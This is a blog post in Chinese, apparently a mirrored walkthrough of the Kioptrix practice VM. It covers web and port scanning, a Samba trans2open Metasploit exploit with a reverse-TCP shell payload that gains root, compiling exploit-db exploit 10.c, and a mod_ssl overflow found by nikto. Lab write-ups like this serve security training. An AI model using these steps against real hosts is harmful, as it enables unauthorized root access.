zoukankan      html  css  js  c++  java
  • kioptrix靶机记录

    靶机地址:172.16.1.193

    Kali地址:172.16.1.107

    首页为Apache测试页,没看到有价值信息

     

    尝试目录扫描:

     

    点击查看:

    http://172.16.1.193/index.html

      http://172.16.1.193/manual/

        http://172.16.1.193/manual/mod/mod_ssl/

    User manual  mod_ssl version 2.8

    http://172.16.1.193/usage/

      Webalizer

    http://172.16.1.193/mrtg/                                                     

    好吧,我还是不要在web上执迷不悟了,端口扫描看看。

     

    发现了139端口,sambaKalimsf尝试攻击

     

    使用第11个,exploit/linux/samba/trans2open,设置目标ip为靶机地址

     

    show payloads 查看可使用的载荷

     

    选择反弹shell的方式,set payload linux/x86/shell/reverse_tcp,运行

     

    expolit得到反弹shell

     

    权限为root,完成

    漏洞利用方法二:

    Kali搜索

     

      

    使用/usr/share/exploitdb/exploits/multiple/remote/10.c,复制出来,使用gcc编译

     

    查看并设置参数执行。获取root权限

     

    完成。

    注:

      网上还有其他方法

    使用Apache OpenSSL溢出漏洞利用

    使用nikto扫描

      命令nikto -h 172.16.1.193 -o result.html

    发现可用信息:

     mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

    Kali搜索Apache OpenSSL,选择利用

     。。。该方法也能拿到root权限。

  • 相关阅读:
    云计算分布式大数据神器Spark实战高手之旅
    Spring IOC及AOP学习总结
    Win7下不能查看xp系统共享的文件,解决方法
    c#怎样获取excel单元格的RGB颜色
    MySQL 全角转换为半角
    【剑指offer】旋转数组的最小值
    POJ 2524 :Ubiquitous Religions
    GitLal+sourceTree版本号管理
    ASP.NET MVC 过滤器(五)
    Java设计模式之观察者模式
  • 原文地址:https://www.cnblogs.com/appear001/p/12101586.html
Copyright © 2011-2022 走看看